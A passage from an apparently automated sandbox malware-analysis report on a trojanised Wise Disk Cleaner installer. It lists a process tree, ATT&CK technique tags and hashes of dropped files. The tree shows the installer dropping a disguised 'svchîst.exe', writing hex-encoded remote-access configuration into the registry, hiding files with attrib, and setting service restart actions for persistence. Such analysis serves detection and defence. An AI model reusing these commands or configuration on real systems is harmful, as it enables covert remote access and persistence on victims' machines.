3746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f
        5⤵
        Modifies registry class
        
        PID:2040
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2988
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f
        5⤵
        Modifies registry class
        
        PID:4636
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:116
    - - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f
        5⤵
        
        PID:4740
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:4464
- - C:\Windows\SysWOW64\drivers\svchîst.exe
    "C:\Windows\System32\drivers\svchîst.exe" /silentinstall
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1120
- - C:\Windows\SysWOW64\drivers\svchîst.exe
    "C:\Windows\System32\drivers\svchîst.exe" /firewall
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:3052
- - C:\Windows\SysWOW64\drivers\svchîst.exe
    "C:\Windows\System32\drivers\svchîst.exe" /start
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1932
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s "C:\Windows\System32\idfgvgjnghcdfb.reg"
    3⤵
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:544
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s "svchîst.exe"
    3⤵
    - Drops file in Drivers directory
    - Views/modifies file attributes
    PID:1196
- - C:\Windows\SysWOW64\attrib.exe
    attrib -h -s "install.exe"
    3⤵
    - Drops file in Drivers directory
    - Views/modifies file attributes
    PID:540
- - C:\Windows\SysWOW64\attrib.exe
    attrib -h -s "install.cmd"
    3⤵
    - Views/modifies file attributes
    PID:4584
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f& REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f& Exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:528
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f
    3⤵
    PID:544
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f
    3⤵
    PID:1196
- C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
  "C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe" /VERYSILENT /LANG=ru /TASKS=desktopicon
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:876
- - C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp" /SL5="$40028,3793825,188928,C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe" /VERYSILENT /LANG=ru /TASKS=desktopicon
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:4632
  - - C:\Users\Admin\AppData\Local\Temp\is-RO3QC.tmp\CSTask.exe
      "C:\Users\Admin\AppData\Local\Temp\is-RO3QC.tmp\CSTask.exe" "WDCSkipUAC" "C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"
      4⤵
      Executes dropped EXE
      PID:4516
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"
  2⤵
  PID:2172
- - C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe
    "C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks for any installed AV software in registry
    - Enumerates connected drives
    - Modifies Internet Explorer settings
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2408
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "C:\Program Files\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"
  2⤵
  PID:2752
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\*.*"
  2⤵
  PID:2512
- - C:\Windows\SysWOW64\attrib.exe
    attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\*.*"
    3⤵
    - Views/modifies file attributes
    PID:3564
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c RMDIR /s/q "C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner"
  2⤵
  PID:3504
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Wise Disk Cleaner 10.3.6.788" /f
  2⤵
  PID:4416
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Wise Disk Cleaner 10.3.6.788" /f
    3⤵
    PID:3720

C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\SysWOW64\drivers\svchîst.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:856
- C:\Windows\SysWOW64\drivers\svchîst.exe
  C:\Windows\SysWOW64\drivers\svchîst.exe -firewall
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:4208

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

Security Software Discovery

T1063

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Arabic.ini

Filesize
46KB

MD5
3e543da6bcc0ee84d53d88438fafc799

SHA1
c86b179b803d37852e73a6145c135431b4d52d74

SHA256
586419de24beb7faee4a142ee0b5b78c35ff9b7ae4e4a7cc50fb1e2bf082f98c

SHA512
3a3cedfdbc40e9a2458f1117d08e034881c4ff8ed090bdb2f40f095ee53ec7a4d23dc83fd3ce1fea5939fe43cf31419fcbff799a88ef078e60dae9b6035d0640

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Belarusian(Cyrillic).ini

Filesize
49KB

MD5
538d04c6d3802d211d59fe34d24b08b2

SHA1
dd24233a739f0dc681b31d215006b407d4b10395

SHA256
fd915abe1e9c0deb8e103624eb5f0c4f29ad9506092214da36e4e9ea85add212

SHA512
6f759975e4f4c95145ab862190428dbf7cf8ab8e5e32379cc44cb9c1f63c7c87e8263033dced3f55d2ef7e61212f22d3892907f823f1e9029dbc7a776de70e31

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Belarusian(Latin).ini

Filesize
50KB

MD5
09acc2789101dbef07ab7e1c6be7ace6

SHA1
7a55791699490fc7b23fb51fd1b5f0f322a05447

SHA256
2007a5a9dbac09656e761b04448e53dd094ec30355f6394204158648d89131d4

SHA512
ad5071fb49485dc2a8a7d1ab2f7471b90d403b733bce3bf5cffdf017915cf89c719a0d63b6c22d7fe934dcb3713c8748e1f9fcaf6891feeb53ddc2d7c51998e5

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Bulgarian.ini

Filesize
59KB

MD5
8db61046f722c6feddf6e9ff36395cb1

SHA1
32a99cfa048b1bdfa2a27d8618ebcbea98ef31ac

SHA256
65fedfe3cf7024a0345345e7973f67f0c6b8b0f548dcdca5c4f48c0b667d22e8

SHA512
a34408d86ad01faf8d7a5b651210943b4e8d5d3c4226eb4c082e5c7c346611015fa9139c3774d365df70d0d146a4a7c49fb1ff8ee04d668c3129d8c49a3bd207

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Catalan(Spain).ini

Filesize
58KB

MD5
e06f62dcb6360c54d0c99e58f7108a1b

SHA1
60d47951f1cb0fff9abcccfdbd297337e5435130

SHA256
7efcb6193c689aab517532b3a7dde3fbce7e42c6060fb698844458aaeae6656b

SHA512
fa6d8726032afa24926e374d8496d73a61776cda53d735a980a87b1aaf2db160ec7a8243bf9e6c034d18218a2f1222d256f820c059c77647648456432682078e

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Chinese(Simplified).ini

Filesize
57KB

MD5
ddb1e3858ba84d18e832bf926f71b8d3

SHA1
ff7af2ab8f8a9b21895e260055df79b10b1e3da2

SHA256
ac03ab706d80d0175939940091df58543eb885a5cc939e7dfa72a12dfe0a680e

SHA512
b4b8da9b1b3b363e4e614a1ba52b926d785056011f2927febad29680df22225ded628141bff4b3bb9e9d11a77b88db5b44ef8955142ecb599f2891a09077fb23

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Chinese(Traditional).ini

Filesize
28KB

MD5
3b2fe60c4ace1c7733549c1e892622fa

SHA1
5903fa94e31186df51bf520add0542153c963a71

SHA256
c983c82379b6dc354f7dc4fb37e5ee147069c1141503df4a1efa22884969a69f

SHA512
ebf3e1ef1354916d9cd3f4ba7f9c2a175e6b9d162e4380a69f551926c132079494b67ff3defaace968659dde396cb3e0a191c4bdea9ac6dde7349c563c1756ab

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Czech.ini

Filesize
58KB

MD5
a1800a0b75aaf75089172dce6d9cbcba

SHA1
6eb1245d876ebfd253c77df807acfae0b6c72eed

SHA256
10d4accda03a1fb836d02eaab186054b49acb1630edd0a07c8d2653234266b1d

SHA512
6262cd53a2993d985e2c440a45a872a43cc9de8df380bbbf861df3748243c3768f85adf4db6e18ba148cd2d0ae3c6eb7d77f822c8015364d94114141d605a917

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Danish.ini

Filesize
47KB

MD5
3ca37cef05d366f1e10a49a6dde3225a

SHA1
2734b737b07ffdcdf7bd410b29e3030c94482dfe

SHA256
0714b1684aa7d1cab8978138754bcf712b43162e45e48c74aab1d588907d2a46

SHA512
e7d1aad57bb919f192427afe3558dc1c4467d82378b742a82da40ef430db5b8aa41aaec562bbc71ef36731d0800b113e1e38e861f9967904e07f6d4a64a01974

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Dutch (Nederlands).ini

Filesize
75KB

MD5
8e2dedf7ad4959dcba5aad9221755ac1

SHA1
1e47e115dc2fb5cc2e27d1ab2726b85409c8338b

SHA256
32f54c23c8760205d74885992cd8e11fd23911b44660078e1ee11e01af3f4106

SHA512
b932acbbd885fe68dc6ab31386bf3a9d6523ef7e3063c922cf77ac90ec147f7df1c087bcd067f8677abfb3b134f161035f7116c25ba544d93461e372f8e93a37

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\English.ini

Filesize
73KB

MD5
dfb897952f03b002a95ef8f47a98afe5

SHA1
cd9801955ea04a949175cbb8a3972488ef15e966

SHA256
86da3520698f44289c789b1d4771929edc36f5dd36c6ba54e1382a06a39c7684

SHA512
8536477f154d0687e0c6673b553a27c1f2ef2b38231162e31ab4039db0d772d5d652518f15ddddbf74f981345307eef175321ae262514b06506b18823e0dc5ba

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Finnish.ini

Filesize
78KB

MD5
dc73d7da4015500c369caacb8ef26e21

SHA1
c33246680111d1fc3fb3cdac10dd7c37f9f05a33

SHA256
d70edac364dd4273a80e40e5d3a710198576b1cfd81e3cec0bfb4d4683dd50fb

SHA512
0f4f0a50f3dd36999864669f078d686b5af04cfb750951c9abe2cdbb609c683e447fd56ac28a34d4a83e53444c12d13cc742bcc9bd3236ba6e363dfbcecbf3f8

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\French.ini

Filesize
79KB

MD5
3ec80eda36af3cae27ad0bc179efe392

SHA1
42924e65a3b9bef333b9f546343cf30d6fe25d71

SHA256
0c05485c08fc6877eae77afa6d38623360c16aadf9b6ad0271079854b6d8b83e

SHA512
6f5a1c499adb8d8fd20b29293a8b91e942de6945df1df0185d7e2e71ed48ea917f38b785f206f0d6065b6ae4a5b85f38e8275315e86679d4def32f35d1351cb4

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\German.ini

Filesize
59KB

MD5
12aa09156da6482c24a1b2d4b55d855c

SHA1
1c2dad1b7d7beeb65710da2efafe36688754000e

SHA256
2fd313688b2ad99a3a4be590b5b96f4932cdecf5211771b84f2d060b00a3893e

SHA512
0742e6ab784dc765dcd13f0551883bad341b254cb993a8a6016ffbd18846109bbb6f00611dfde797db8382e014805c6e2a8ac38c50c827054af9ac7447e511dd

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Greek.ini

Filesize
70KB

MD5
6e449bd01c21478ec0c19bd25a8c3ee5

SHA1
2aeba60b7600ca9e71a5fdd04c06ba05f1010262

SHA256
5c891ead72b187252daf3de22075a9c0e7f967e3050aec97db6f019d59bec138

SHA512
b691de0ac4254a29a6dd87fdfa5973c4b8c11719304ed665d6db661df66d7a1693e15514477979e24eabcd48fe9287fe07a123da6a469ef5dad07cf43d531021

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Hebrew.ini

Filesize
65KB

MD5
75009c9455e68643ac2e2301b8af20e2

SHA1
3091a33bb6517115b38f4eb3cad3747f3b64569c

SHA256
05746a60b31c255eaf1ea903c5ad47f3e25d98633472cee165acbec3521c64a8

SHA512
18619921ab3bcf481466960f1cab10b2185be93470ee9b6cd01377b523ea8810e6d159a4515a0cfa575df3617f47fc5cee7d5982cc2deff0fa8a69644e7a0eb8

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Hungarian.ini

Filesize
78KB

MD5
b967b7a48eca3f5076033759089e4142

SHA1
9e29f54c07066608be1cb6abc59cf7cda823cc03

SHA256
1ecce57dbf90759fcfefbea163521dfb8d3281a98c216d94ec51771308cf32dd

SHA512
4a588f3150e21d1b7923fc885ab28f36a40488157f583de9558476d04a2ceb5fa3d0f91ba09d12aacee1a0a8d5797c4be6e15ba01e6a01427e1de88845bd04cb

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Indonesian.ini

Filesize
61KB

MD5
0a763d65adccbe593039ccdcfde7b499

SHA1
833c56164a17b152d4098ee95fd4bb6912193a89

SHA256
759b0029fc140d49cb40bcd197fc64537fe408cd78641d0cecafac599aa97d10

SHA512
b83d88ce225621e0460d40c8c9ad92e91ffe1c0b3875270ff8ed8aa66a7b3a08c6605e6f4e7b7bf5d02b9ea2ab7256dff07f2bf31232d2675de869d06bfc9d7e

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Italian.ini

Filesize
73KB

MD5
4b9f92249266356fea5844eccdc6e6f1

SHA1
0a060c8d39e98fbda3411b8b915a83754af54089

SHA256
1a2f241b503be86067d89a8fcb69bdffcccec96912a765337dfadcce6bca75b0

SHA512
8ab4323d596a71d1cbc9492b48eb6f6996ddd0411edd6732417b68dd27d1acb2f00c17865ce7a17dac58947dd7482771c11c8fc5c2b73561a47469641fe9a82a

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Japanese.ini

Filesize
37KB

MD5
7792786223200e5da40d9c542a7f4b8b

SHA1
b71f45389d66dfb56303a81547aafcd3bfbe869a

SHA256
a62a2aaf6e39e46a9cb0053a670d09dcb4aaf9142f89a7b12daad1793154db9a

SHA512
2a3d66677eeeea065392d27546bc2fba5e115f906cd1dc4398dd848f104a9d5cf98d2dfec8daa432ad94ee6f93bd45d5f300c0c6801bbfadb073639b3f5f32e7

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Korean.ini

Filesize
60KB

MD5
8f674280944a449f943689e19ad0ced2

SHA1
90c7d3972bb418eecb2696e2e7390df2c0a33a7d

SHA256
a2223c96dc9fced161469aa2989db97ba0e9393dc86cbdc7aa06d4342772a000

SHA512
6b788b826af729a2217d6b5d72bdaf4ab9682e6cd71331d1c5da4384fc25a4b4d9f2b44d776b65a8ade2d589ce55baa7e00f11a9d53a36fa79ce5943f843df65

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Nepali.ini

Filesize
52KB

MD5
8e9d6867bb1b047e0e7eecf8a7ab4151

SHA1
269c9258fed0552758c75897ed8346e7e8c4eb2b

SHA256
44c210cf753a79acba19b171fe4643056dee29d441ccf91fa6121b7e441cd2ea

SHA512
817e7016dd68f6402029c1f8fa49ac2edd8d114f06ac5a8c1b68b39e77279d6e68ec49a575da950e1c9d686488195bebb95d0997bf3123bfe54dfffcea689183

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Norwegian (Bokmal).ini

Filesize
47KB

MD5
5d95e5077b31764d3d91ace0ea64490f

SHA1
12bcc6fd0e6fa8c7109cc4cf19033a0c3cd8fadd

SHA256
73721487c7680b844e73079cc57acc6988622506230f73929c63ef197d19c83e

SHA512
f22e764a002e835a51fc4db17320c96241e949f6b437c1f699714e41ca759f096a99c61cc82b773198f962170322cadbd4a5f943550ad7b4355d48cf05915bcc

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Norwegian (Nynorsk).ini

Filesize
46KB

MD5
d82a2f11ab17c1fdc94e8aca732bfdc6

SHA1
58347d500fa9efaf46b600345f9752f426e99b45

SHA256
6e9385096f433f4a4d95997d0483ab08695b6b7cf2c9f1f525cf41b83c85459c

SHA512
61f6ddad161a8e0df43b60e424fbd83e0d759f1bedfcfd5268c803f98d98ba4006b1c2f9f2b63b3a3461401fdbf16dec2cd07d8fac15af7eb61fd5b79a564343

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Persian.ini

Filesize
69KB

MD5
71f1fe9e66926028a09b7a5ff36ec42a

SHA1
521a99b288ae887391c36fb86555e25df5685164

SHA256
8044110a96bbe6dcc5cc74fa8106a2ed250536ea8785b0eb1148a696c74c5353

SHA512
62c8b5c0eda2163d7093da06a176270558f377d0e7fc8fd2aea137045c5fdc4cf62be47fc2c215e2bf4d68ba8eb343ceb70bce1b991502ecd1407350dab086c5

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Polish.ini

Filesize
59KB

MD5
1a59560e88582dac1e5b7a70a38463a5

SHA1
fe80e956dbf54bd066f2f11d697072377dd3df6b

SHA256
b826a3a9198323ce5b29ba96a311a632b98c05fbf4d02213abd30ce0ea262427

SHA512
0d00273db68c3ebb58f0be6102b1f23d2096197aacaa8577aa42473aa1b587f50c86f333c1831b78879b2ba5ab1793488af1f875ed111eb800a1b2c9becdf69e

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Portuguese(Brasil).ini

Filesize
72KB

MD5
3445d1277329541b11ddb2b1b5dc54f5

SHA1
57fac60be3e79eb01d4170df6abbb44dc62c21e6

SHA256
c34cf5c5773429d9c1273bdeebaf59fc0f7984db541f6524d2c1718c191aeed2

SHA512
2b0080337609bd458677532371a9226b9112edc9a1c8a6567423fd324559338c934ae409a012a903ca6f464281c327a812aefe932395d9e739ef8f0e379ebf28

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Portuguese(Portugal).ini

Filesize
74KB

MD5
66ccf14a92b6354bed01867615a76d90

SHA1
7f133285713146b2e343d44c0de190fac75e40f6

SHA256
a3af006e4957a14abd637e50cf265ecba049ca53ff716ec0298c96a0265a2f9e

SHA512
